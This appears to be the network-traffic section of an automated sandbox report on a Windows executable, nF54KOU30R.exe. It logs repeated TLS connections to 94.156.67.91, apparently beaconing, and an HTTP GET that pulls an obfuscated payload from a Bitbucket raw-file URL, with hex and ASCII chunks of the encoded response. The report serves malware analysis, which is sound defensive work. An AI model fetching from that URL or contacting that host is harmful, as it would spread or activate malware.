May 24, 2024 05:10:26.403357983 CEST	49742	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:26.403409958 CEST	443	49742	94.156.67.91	192.168.2.4
May 24, 2024 05:10:26.404355049 CEST	443	49742	94.156.67.91	192.168.2.4
May 24, 2024 05:10:26.405049086 CEST	49742	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:26.450491905 CEST	443	49742	94.156.67.91	192.168.2.4
May 24, 2024 05:10:28.565541029 CEST	49723	80	192.168.2.4	95.101.54.128
May 24, 2024 05:10:28.565709114 CEST	49724	80	192.168.2.4	199.232.214.172
May 24, 2024 05:10:28.571234941 CEST	80	49723	95.101.54.128	192.168.2.4
May 24, 2024 05:10:28.571432114 CEST	49723	80	192.168.2.4	95.101.54.128
May 24, 2024 05:10:28.576451063 CEST	80	49724	199.232.214.172	192.168.2.4
May 24, 2024 05:10:28.576512098 CEST	49724	80	192.168.2.4	199.232.214.172
May 24, 2024 05:10:31.295030117 CEST	443	49742	94.156.67.91	192.168.2.4
May 24, 2024 05:10:31.295203924 CEST	443	49742	94.156.67.91	192.168.2.4
May 24, 2024 05:10:31.295500040 CEST	49742	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:31.295500040 CEST	49742	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:31.295500040 CEST	49742	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:31.596556902 CEST	49742	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:31.596606016 CEST	443	49742	94.156.67.91	192.168.2.4
May 24, 2024 05:10:32.300225973 CEST	49743	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:32.300312996 CEST	443	49743	94.156.67.91	192.168.2.4
May 24, 2024 05:10:32.300404072 CEST	49743	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:32.300484896 CEST	49743	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:32.300503969 CEST	443	49743	94.156.67.91	192.168.2.4
May 24, 2024 05:10:32.972985983 CEST	443	49743	94.156.67.91	192.168.2.4
May 24, 2024 05:10:32.973186970 CEST	49743	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:32.976310968 CEST	49743	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:32.976332903 CEST	443	49743	94.156.67.91	192.168.2.4
May 24, 2024 05:10:32.976855040 CEST	443	49743	94.156.67.91	192.168.2.4
May 24, 2024 05:10:32.977475882 CEST	49743	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:33.022492886 CEST	443	49743	94.156.67.91	192.168.2.4
May 24, 2024 05:10:37.822181940 CEST	443	49743	94.156.67.91	192.168.2.4
May 24, 2024 05:10:37.822360992 CEST	443	49743	94.156.67.91	192.168.2.4
May 24, 2024 05:10:37.822561979 CEST	49743	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:37.822949886 CEST	49743	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:37.822990894 CEST	443	49743	94.156.67.91	192.168.2.4
May 24, 2024 05:10:38.815973043 CEST	49744	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:38.816015959 CEST	443	49744	94.156.67.91	192.168.2.4
May 24, 2024 05:10:38.816098928 CEST	49744	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:38.816181898 CEST	49744	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:38.816189051 CEST	443	49744	94.156.67.91	192.168.2.4
May 24, 2024 05:10:39.439125061 CEST	443	49744	94.156.67.91	192.168.2.4
May 24, 2024 05:10:39.439214945 CEST	49744	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:39.458187103 CEST	49744	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:39.458209038 CEST	443	49744	94.156.67.91	192.168.2.4
May 24, 2024 05:10:39.459276915 CEST	443	49744	94.156.67.91	192.168.2.4
May 24, 2024 05:10:39.459999084 CEST	49744	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:39.502533913 CEST	443	49744	94.156.67.91	192.168.2.4
May 24, 2024 05:10:44.341814995 CEST	443	49744	94.156.67.91	192.168.2.4
May 24, 2024 05:10:44.341985941 CEST	443	49744	94.156.67.91	192.168.2.4
May 24, 2024 05:10:44.342092037 CEST	49744	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:44.342130899 CEST	49744	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:44.342149973 CEST	443	49744	94.156.67.91	192.168.2.4
May 24, 2024 05:10:45.331252098 CEST	49745	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:45.331295967 CEST	443	49745	94.156.67.91	192.168.2.4
May 24, 2024 05:10:45.331387043 CEST	49745	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:45.331468105 CEST	49745	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:45.331475019 CEST	443	49745	94.156.67.91	192.168.2.4
May 24, 2024 05:10:45.953305006 CEST	443	49745	94.156.67.91	192.168.2.4
May 24, 2024 05:10:45.953465939 CEST	49745	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:45.957030058 CEST	49745	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:45.957043886 CEST	443	49745	94.156.67.91	192.168.2.4
May 24, 2024 05:10:45.958055019 CEST	443	49745	94.156.67.91	192.168.2.4
May 24, 2024 05:10:45.958709955 CEST	49745	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:46.002535105 CEST	443	49745	94.156.67.91	192.168.2.4
May 24, 2024 05:10:50.856564999 CEST	443	49745	94.156.67.91	192.168.2.4
May 24, 2024 05:10:50.856738091 CEST	443	49745	94.156.67.91	192.168.2.4
May 24, 2024 05:10:50.856784105 CEST	49745	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:50.859484911 CEST	49745	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:50.859500885 CEST	443	49745	94.156.67.91	192.168.2.4
May 24, 2024 05:10:51.862471104 CEST	49746	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:51.862514019 CEST	443	49746	94.156.67.91	192.168.2.4
May 24, 2024 05:10:51.862591982 CEST	49746	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:51.862673044 CEST	49746	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:51.862679005 CEST	443	49746	94.156.67.91	192.168.2.4
May 24, 2024 05:10:52.515259981 CEST	443	49746	94.156.67.91	192.168.2.4
May 24, 2024 05:10:52.515340090 CEST	49746	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:52.950368881 CEST	49746	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:52.950418949 CEST	443	49746	94.156.67.91	192.168.2.4
May 24, 2024 05:10:52.951322079 CEST	443	49746	94.156.67.91	192.168.2.4
May 24, 2024 05:10:52.954361916 CEST	49746	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:52.994600058 CEST	443	49746	94.156.67.91	192.168.2.4
May 24, 2024 05:10:57.418282986 CEST	443	49746	94.156.67.91	192.168.2.4
May 24, 2024 05:10:57.418538094 CEST	443	49746	94.156.67.91	192.168.2.4
May 24, 2024 05:10:57.418601990 CEST	49746	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:57.422538042 CEST	49746	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:57.422554970 CEST	443	49746	94.156.67.91	192.168.2.4
May 24, 2024 05:10:58.425297022 CEST	49747	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:58.425326109 CEST	443	49747	94.156.67.91	192.168.2.4
May 24, 2024 05:10:58.425462008 CEST	49747	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:58.425576925 CEST	49747	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:58.425581932 CEST	443	49747	94.156.67.91	192.168.2.4
May 24, 2024 05:10:59.073664904 CEST	443	49747	94.156.67.91	192.168.2.4
May 24, 2024 05:10:59.074026108 CEST	49747	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:59.084347010 CEST	49747	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:59.084425926 CEST	443	49747	94.156.67.91	192.168.2.4
May 24, 2024 05:10:59.085419893 CEST	443	49747	94.156.67.91	192.168.2.4
May 24, 2024 05:10:59.086679935 CEST	49747	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:59.130506039 CEST	443	49747	94.156.67.91	192.168.2.4
May 24, 2024 05:11:03.971470118 CEST	443	49747	94.156.67.91	192.168.2.4
May 24, 2024 05:11:03.971630096 CEST	443	49747	94.156.67.91	192.168.2.4
May 24, 2024 05:11:03.971704006 CEST	49747	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:03.971779108 CEST	49747	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:03.971796989 CEST	443	49747	94.156.67.91	192.168.2.4
May 24, 2024 05:11:04.972012997 CEST	49748	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:04.972098112 CEST	443	49748	94.156.67.91	192.168.2.4
May 24, 2024 05:11:04.972259045 CEST	49748	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:04.972323895 CEST	49748	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:04.972342014 CEST	443	49748	94.156.67.91	192.168.2.4
May 24, 2024 05:11:05.602756977 CEST	443	49748	94.156.67.91	192.168.2.4
May 24, 2024 05:11:05.602992058 CEST	49748	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:05.670070887 CEST	49748	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:05.670094967 CEST	443	49748	94.156.67.91	192.168.2.4
May 24, 2024 05:11:05.671143055 CEST	443	49748	94.156.67.91	192.168.2.4
May 24, 2024 05:11:05.702195883 CEST	49748	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:05.742568970 CEST	443	49748	94.156.67.91	192.168.2.4
May 24, 2024 05:11:10.505115032 CEST	443	49748	94.156.67.91	192.168.2.4
May 24, 2024 05:11:10.505296946 CEST	443	49748	94.156.67.91	192.168.2.4
May 24, 2024 05:11:10.505507946 CEST	49748	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:10.505507946 CEST	49748	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:10.505507946 CEST	49748	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:10.815654993 CEST	49748	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:10.815721035 CEST	443	49748	94.156.67.91	192.168.2.4
May 24, 2024 05:11:11.503360033 CEST	49749	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:11.503444910 CEST	443	49749	94.156.67.91	192.168.2.4
May 24, 2024 05:11:11.503560066 CEST	49749	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:11.503629923 CEST	49749	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:11.503648996 CEST	443	49749	94.156.67.91	192.168.2.4
May 24, 2024 05:11:12.152793884 CEST	443	49749	94.156.67.91	192.168.2.4
May 24, 2024 05:11:12.152908087 CEST	49749	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:12.163635015 CEST	49749	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:12.163660049 CEST	443	49749	94.156.67.91	192.168.2.4
May 24, 2024 05:11:12.164624929 CEST	443	49749	94.156.67.91	192.168.2.4
May 24, 2024 05:11:12.181149006 CEST	49749	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:12.226497889 CEST	443	49749	94.156.67.91	192.168.2.4
May 24, 2024 05:11:17.051691055 CEST	443	49749	94.156.67.91	192.168.2.4
May 24, 2024 05:11:17.051848888 CEST	443	49749	94.156.67.91	192.168.2.4
May 24, 2024 05:11:17.051959038 CEST	49749	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:17.080635071 CEST	49749	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:17.080635071 CEST	49749	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:17.080701113 CEST	443	49749	94.156.67.91	192.168.2.4
May 24, 2024 05:11:17.080737114 CEST	443	49749	94.156.67.91	192.168.2.4
May 24, 2024 05:11:18.066214085 CEST	49750	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:18.066298008 CEST	443	49750	94.156.67.91	192.168.2.4
May 24, 2024 05:11:18.066459894 CEST	49750	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:18.066647053 CEST	49750	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:18.066664934 CEST	443	49750	94.156.67.91	192.168.2.4
May 24, 2024 05:11:18.708276033 CEST	443	49750	94.156.67.91	192.168.2.4
May 24, 2024 05:11:18.708666086 CEST	49750	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:18.722906113 CEST	49750	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:18.722981930 CEST	443	49750	94.156.67.91	192.168.2.4
May 24, 2024 05:11:18.723948002 CEST	443	49750	94.156.67.91	192.168.2.4
May 24, 2024 05:11:18.728319883 CEST	49750	443	192.168.2.4	94.156.67.91
May 24, 2024 05:11:18.774528980 CEST	443	49750	94.156.67.91	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 24, 2024 05:09:39.222965956 CEST	50025	53	192.168.2.4	1.1.1.1
May 24, 2024 05:09:39.230247021 CEST	53	50025	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 24, 2024 05:09:39.222965956 CEST	192.168.2.4	1.1.1.1	0x5b90	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 24, 2024 05:09:33.795609951 CEST	1.1.1.1	192.168.2.4	0x3ae4	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 05:09:33.795609951 CEST	1.1.1.1	192.168.2.4	0x3ae4	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
May 24, 2024 05:09:39.230247021 CEST	1.1.1.1	192.168.2.4	0x5b90	No error (0)	bitbucket.org		104.192.141.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

bitbucket.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	104.192.141.1	443	7568	C:\Users\user\Desktop\nF54KOU30R.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-24 03:09:40 UTC	169	OUT	GET /exlices2dsasd/felijsd/raw/97efb5e9acdf5e9946a2959d44a26bcaae894841/DEFSAFAAAAAAAAVCC HTTP/1.1 Accept: / User-Agent: Chrome/95.0.4638.54 Host: bitbucket.org
2024-05-24 03:09:40 UTC	3112	IN	HTTP/1.1 200 OK server: envoy x-usage-quota-remaining: 993370.649 vary: Authorization, Accept-Language, Origin, Accept-Encoding x-usage-request-cost: 6649.10 Cache-Control: max-age=900 Content-Type: text/plain x-b3-traceid: da0ce35175c13cf4 x-usage-output-ops: 0 x-used-mesh: False x-dc-location: Micros-3 content-security-policy: base-uri 'self'; connect-src bitbucket.org .bitbucket.org bb-inf.net .bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas [TRUNCATED] Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Date: Fri, 24 May 2024 03:09:40 GMT x-usage-user-time: 0.047155 x-usage-system-time: 0.002318 x-served-by: 55d4aadbd9e7 x-envoy-upstream-service-time: 79 content-language: en x-view-name: bitbucket.apps.repo2.views.filebrowse_raw x-b3-spanid: da0ce35175c13cf4 Accept-Ranges: bytes etag: "f5137704434be7aff16944fc9e5fcef0" x-static-version: e57dff4fbfe0 x-render-time: 0.06783127784729004 Connection: close x-usage-input-ops: 600 last-modified: Thu, 23 May 2024 20:14:14 GMT x-version: e57dff4fbfe0 x-request-count: 2117 x-frame-options: SAMEORIGIN X-Cache-Info: caching Content-Length: 484696
2024-05-24 03:09:40 UTC	8688	IN	Data Raw: 74 76 51 71 7d 7d 2f 7d 7d 7d 7d 65 7d 7d 7d 7d 40 40 38 7d 7d 6c 47 7d 7d 7d 7d 7d 7d 7d 7d 7d 71 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 38 7d 7d 7d 7d 7d 34 46 55 47 34 7d 54 7d 4e 6e 69 42 47 7b 74 2f 30 48 76 7e 48 50 2d 59 7b 57 2d 4d 39 4e 2d 4d 66 54 69 7e 6e 48 42 4d 35 56 44 63 7b 49 3e 73 7b 59 44 77 34 47 3c 77 34 47 72 65 39 74 69 7e 31 56 3e 7e 75 55 64 71 30 6b 6a 7d 7d 7d 7d 7d 7d 7d 7d 7d 7b 44 58 38 33 6b 7e 3c 3c 4a 4d 72 4d 4d 4f 35 4b 3e 50 51 6f 3e 44 52 4d 4e 4d 72 55 4d 4f 35 4d 3c 55 51 32 3e 7e 6b 3c 4a 4d 78 3c 35 51 3e 4b 73 50 51 6f 3e 32 51 4e 21 4d 72 63 4d 4f 35 4b 3e 50 51 6b 3e 6c 6b 3c 4a 4d 2d 64 73 50 35 47 7c 50 51 6f Data Ascii: tvQq}}/}}}}e}}}}@@8}}lG}}}}}}}}}q}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}8}}}}}4FUG4}T}NniBG{t/0Hv~HP-Y{W-M9N-MfTi~nHBM5VDc{I>s{YDw4G<w4Gre9ti~1V>~uUdq0kj}}}}}}}}}{DX83k~<<JMrMMO5K>PQo>DRMNMrUMO5M<UQ2>~k<JMx<5Q>KsPQo>2QN!MrcMO5K>PQk>lk<JM-dsP5G\|PQo
2024-05-24 03:09:40 UTC	7696	IN	Data Raw: 7d 6a 48 73 2d 47 64 57 64 64 30 7d 7d 66 71 7d 7d 2f 4f 7d 7d 66 57 7d 7d 6e 2f 7d 57 6e 4b 7d 74 71 7d 7d 6c 49 53 7d 76 58 2d 7d 3e 71 7d 7d 73 7d 7d 7d 30 71 7d 7d 74 47 64 77 7d 63 2f 69 7d 6e 7b 47 64 71 64 54 5a 3c 4b 7d 7d 6a 30 7d 7d 63 34 7d 7d 6b 4b 7d 7d 7e 57 7d 5a 59 38 7d 54 71 7d 7d 32 46 30 7d 76 4c 4f 7d 36 57 7d 7d 45 7d 7d 7d 7c 7d 7d 7d 58 47 63 49 7d 6a 75 21 7d 7e 48 36 4a 7d 7b 7c 64 6b 30 7d 7d 66 7c 7d 7d 2f 7c 7d 7d 6a 34 7d 7d 6f 69 7d 45 7e 7d 7d 21 71 7d 7d 57 49 57 7d 6e 73 47 7d 2d 47 7d 7d 4a 71 7d 7d 39 7d 7d 7d 72 47 64 77 7d 68 63 58 7d 66 49 4d 63 71 7d 47 44 59 65 7d 7d 66 53 7d 7d 68 7d 7d 7d 66 2d 7d 7d 6a 4b 7d 40 53 69 7d 74 47 7d 7d 35 68 7d 7d 58 7b 47 7d 6e 7d 7d 7d 69 71 7d 7d 73 57 7d 7d 5a 57 64 50 7d 66 70 Data Ascii: }jHs-GdWdd0}}fq}}/O}}fW}}n/}WnK}tq}}lIS}vX-}>q}}s}}}0q}}tGdw}c/i}n{GdqdTZ<K}}j0}}c4}}kK}}~W}ZY8}Tq}}2F0}vLO}6W}}E}}}\|}}}XGcI}ju!}~H6J}{\|dk0}}f\|}}/\|}}j4}}oi}E~}}!q}}WIW}nsG}-G}}Jq}}9}}}rGdw}hcX}fIMcq}GDYe}}fS}}h}}}f-}}jK}@Si}tG}}5h}}X{G}n}}}iq}}sW}}ZWdP}fp
2024-05-24 03:09:40 UTC	8688	IN	Data Raw: 7d 6f 33 66 7d 6b 30 70 64 7d 63 39 46 66 2d 7d 7d 64 38 7d 7d 68 38 7d 7d 6a 53 7d 7d 6b 47 7d 39 57 57 7d 6a 57 7d 7d 32 59 2d 7d 46 49 38 7d 69 57 7d 7d 36 71 7d 7d 7c 71 7d 7d 7e 47 7b 4e 7d 7d 2d 44 7d 6f 76 53 76 47 64 74 4a 54 47 7d 7d 6b 2d 7d 7d 65 38 7d 7d 66 47 7d 7d 6f 2d 7d 7d 3c 38 7d 46 47 7d 7d 52 45 2f 7d 7c 7c 4b 7d 7e 47 7d 7d 39 57 7d 7d 6e 7d 7d 7d 77 47 64 54 7d 7e 54 51 7d 63 35 4f 2f 47 63 4a 36 37 4f 7d 7d 64 4f 7d 7d 7b 2d 7d 7d 2f 4b 7d 7d 6a 65 7d 51 4f 7c 7d 44 7d 7d 7d 2f 6a 38 7d 51 35 7d 7d 7d 47 7d 7d 4a 47 7d 7d 77 71 7d 7d 4f 57 7d 76 7d 6b 4d 3c 7d 6a 31 37 2d 47 7b 71 5a 6e 7c 7d 7d 6f 2f 7d 7d 70 34 7d 7d 7e 57 7d 7d 6e 71 7d 66 4d 7c 7d 7b 47 7d 7d 52 46 4b 7d 6c 5a 30 7d 56 47 7d 7d 49 7d 7d 7d 4b 7d 7d 7d 4b 71 63 Data Ascii: }o3f}k0pd}c9Ff-}}d8}}h8}}jS}}kG}9WW}jW}}2Y-}FI8}iW}}6q}}\|q}}~G{N}}-D}ovSvGdtJTG}}k-}}e8}}fG}}o-}}<8}FG}}RE/}\|\|K}~G}}9W}}n}}}wGdT}~TQ}c5O/GcJ67O}}dO}}{-}}/K}}je}QO\|}D}}}/j8}Q5}}}G}}JG}}wq}}OW}v}kM<}j17-G{qZn\|}}o/}}p4}}~W}}nq}fM\|}{G}}RFK}lZ0}VG}}I}}}K}}}Kqc
2024-05-24 03:09:40 UTC	6784	IN	Data Raw: 65 7d 7d 7d 58 7d 7d 7d 33 57 7d 7d 58 7d 7d 35 7d 7e 69 6f 7d 6c 50 6c 4a 71 7d 4c 42 6f 4f 7d 7d 6c 4b 7d 7d 63 7c 7d 7d 69 2f 7d 7d 66 4b 7d 2d 3c 7d 7d 56 47 7d 7d 63 63 7d 7d 45 54 65 7d 36 47 7d 7d 57 47 7d 7d 6b 57 7d 7d 21 71 7b 4c 7d 6e 44 38 7d 6e 31 4d 73 71 63 71 78 54 7d 7d 7d 6e 71 7d 7d 6f 2f 7d 7d 70 7d 7d 7d 7d 53 7d 5a 6f 47 7d 57 47 7d 7d 21 2f 65 7d 31 55 7c 7d 57 47 7d 7d 35 47 7d 7d 34 7d 7d 7d 66 57 7d 66 7d 63 3c 58 7d 2f 72 47 46 57 63 53 55 51 65 7d 7d 6e 4b 7d 7d 64 2d 7d 7d 66 7c 7d 7d 69 69 7d 3c 53 47 7d 59 47 7d 7d 7c 49 7c 7d 2d 4c 53 7d 7c 7d 7d 7d 64 71 7d 7d 50 7d 7d 7d 53 47 7d 3e 7d 7b 32 39 7d 66 4c 73 3e 7d 7d 70 75 3e 2f 7d 7d 65 4f 7d 7d 66 34 7d 7d 6e 53 7d 7d 6a 7d 7d 65 52 57 7d 53 7d 7d 7d 31 45 71 7d 6e 35 57 Data Ascii: e}}}X}}}3W}}X}}5}~io}lPlJq}LBoO}}lK}}c\|}}i/}}fK}-<}}VG}}cc}}ETe}6G}}WG}}kW}}!q{L}nD8}n1MsqcqxT}}}nq}}o/}}p}}}}S}ZoG}WG}}!/e}1U\|}WG}}5G}}4}}}fW}f}c<X}/rGFWcSUQe}}nK}}d-}}f\|}}ii}<SG}YG}}\|I\|}-LS}\|}}}dq}}P}}}SG}>}{29}fLs>}}pu>/}}eO}}f4}}nS}}j}}eRW}S}}}1Eq}n5W
2024-05-24 03:09:40 UTC	912	IN	Data Raw: 34 57 7d 7d 57 57 63 66 38 47 7b 4f 7d 7d 7d 4d 53 47 7d 21 69 47 64 50 7d 7d 64 75 7d 7d 7b 50 7d 7d 7b 35 7d 2f 2f 7d 2d 2d 7c 7d 7b 33 6a 31 7d 66 4b 40 6a 47 7d 7d 69 47 7d 7d 63 7d 7d 7d 51 7d 7d 7d 32 7d 7d 59 44 57 63 57 7d 7d 7b 53 52 57 63 40 6c 47 7b 4c 7d 7d 64 37 7d 7d 63 32 7d 7d 7b 34 7d 6f 30 7d 37 65 4f 7d 78 3c 74 45 7d 63 66 65 55 47 7d 7d 4c 47 7d 7d 57 71 7d 7d 55 7d 7d 7d 35 71 63 21 7c 7d 63 48 7d 7d 64 3e 36 57 7b 63 75 57 7d 75 7d 7d 7d 3c 7d 7d 63 52 7d 7d 7b 6e 7d 64 69 7d 75 6e 34 7d 52 6f 44 35 7d 2f 2f 6a 3e 47 7d 7d 4d 57 7d 7d 71 71 7d 7d 47 57 7d 7d 36 57 64 58 42 57 7b 50 7d 7d 63 54 6f 57 64 54 49 57 7d 70 7d 7d 7d 51 7d 7d 64 38 7d 7d 7d 73 7d 68 7c 7d 21 53 2d 7d 30 49 44 6e 7d 63 6e 21 7d 47 7d 7d 6c 7d 7d 7d 71 71 7d Data Ascii: 4W}}WWcf8G{O}}}MSG}!iGdP}}du}}{P}}{5}//}--\|}{3j1}fK@jG}}iG}}c}}}Q}}}2}}YDWcW}}{SRWc@lG{L}}d7}}c2}}{4}o0}7eO}x<tE}cfeUG}}LG}}Wq}}U}}}5qc!\|}cH}}d>6W{cuW}u}}}<}}cR}}{n}di}un4}RoD5}//j>G}}MW}}qq}}GW}}6WdXBW{P}}cToWdTIW}p}}}Q}}d8}}}s}h\|}!S-}0IDn}cn!}G}}l}}}qq}
2024-05-24 03:09:40 UTC	15472	IN	Data Raw: 69 47 64 6c 21 7d 64 30 7d 7d 7b 4a 7d 7d 64 54 7d 7d 64 44 7d 6b 2f 7d 6b 6c 2f 7d 48 6a 56 34 7d 6e 4a 63 4b 47 7d 7d 50 57 7d 7d 68 47 7d 7d 6a 57 7d 7d 3e 47 7b 33 32 7d 63 37 7d 7d 64 51 47 57 64 45 73 57 7b 3c 7d 7d 7b 75 7d 7d 7d 7c 7d 7d 64 58 7d 7b 69 7d 6a 53 53 7d 34 7e 4b 59 7d 2f 7b 6a 5a 7d 7d 7d 44 7d 7d 7d 66 57 7d 7d 71 7d 7d 7d 71 57 63 55 4f 7d 7b 4a 7d 7d 64 64 37 7d 7b 7e 75 57 64 2f 7d 7d 7d 5a 7d 7d 63 75 7d 7d 7b 72 7d 6e 57 7d 4f 4b 69 7d 51 63 49 55 7d 6b 7b 38 69 47 7d 7d 76 7d 7d 7d 58 57 7d 7d 4a 57 7d 7d 37 57 63 49 42 47 7b 21 7d 7d 7d 4f 46 71 63 7b 71 7d 64 34 7d 7d 64 65 7d 7d 64 73 7d 7d 7b 7b 7d 6e 53 7d 52 66 4f 7d 4f 73 40 54 7d 69 63 59 3c 47 7d 7d 32 57 7d 7d 56 57 7d 7d 6f 71 7d 7d 57 57 63 2f 4f 47 63 65 7d 7d 7b Data Ascii: iGdl!}d0}}{J}}dT}}dD}k/}kl/}HjV4}nJcKG}}PW}}hG}}jW}}>G{32}c7}}dQGWdEsW{<}}{u}}}\|}}dX}{i}jSS}4~KY}/{jZ}}}D}}}fW}}q}}}qWcUO}{J}}dd7}{~uWd/}}}Z}}cu}}{r}nW}OKi}QcIU}k{8iG}}v}}}XW}}JW}}7WcIBG{!}}}OFqc{q}d4}}de}}ds}}{{}nS}RfO}Os@T}icY<G}}2W}}VW}}oq}}WWc/OGce}}{
2024-05-24 03:09:40 UTC	912	IN	Data Raw: 2f 4f 2d 7d 57 50 6c 73 7d 64 55 38 77 71 7d 7d 42 7d 7d 7d 70 47 7d 7d 36 57 7d 7d 6c 71 63 7e 51 47 63 57 7d 7d 7d 73 3c 7d 7d 66 3c 7d 64 69 7d 7d 7d 70 7d 7d 7b 74 7d 7d 63 54 7d 7b 69 7d 77 6f 38 7d 33 6a 45 6c 7d 6e 4b 6b 36 47 7d 7d 5a 57 7d 7d 3e 47 7d 7d 57 7d 7d 7d 6b 7d 64 40 6b 71 64 4a 7d 7d 7d 39 4a 57 64 64 4c 71 7d 52 7d 7d 64 64 7d 7d 7b 35 7d 7d 64 57 7d 7d 75 7d 32 21 71 7d 78 7e 70 3c 7d 6b 6f 72 77 47 7d 7d 35 7d 7d 7d 78 7d 7d 7d 7e 7d 7d 7d 30 7d 63 68 3e 7d 7b 32 7d 7d 7b 3e 49 71 7b 2d 54 7d 63 48 7d 7d 7b 6c 7d 7d 63 64 7d 7d 7d 58 7d 70 75 7d 75 58 53 7d 70 47 49 4a 7d 70 37 7e 40 71 7d 7d 4e 47 7d 7d 31 47 7d 7d 52 71 7d 7d 4b 7d 64 40 52 57 63 66 7d 7d 63 35 2d 47 64 70 52 71 7d 78 7d 7d 64 59 7d 7d 7b 4f 7d 7d 63 6a 7d 70 75 Data Ascii: 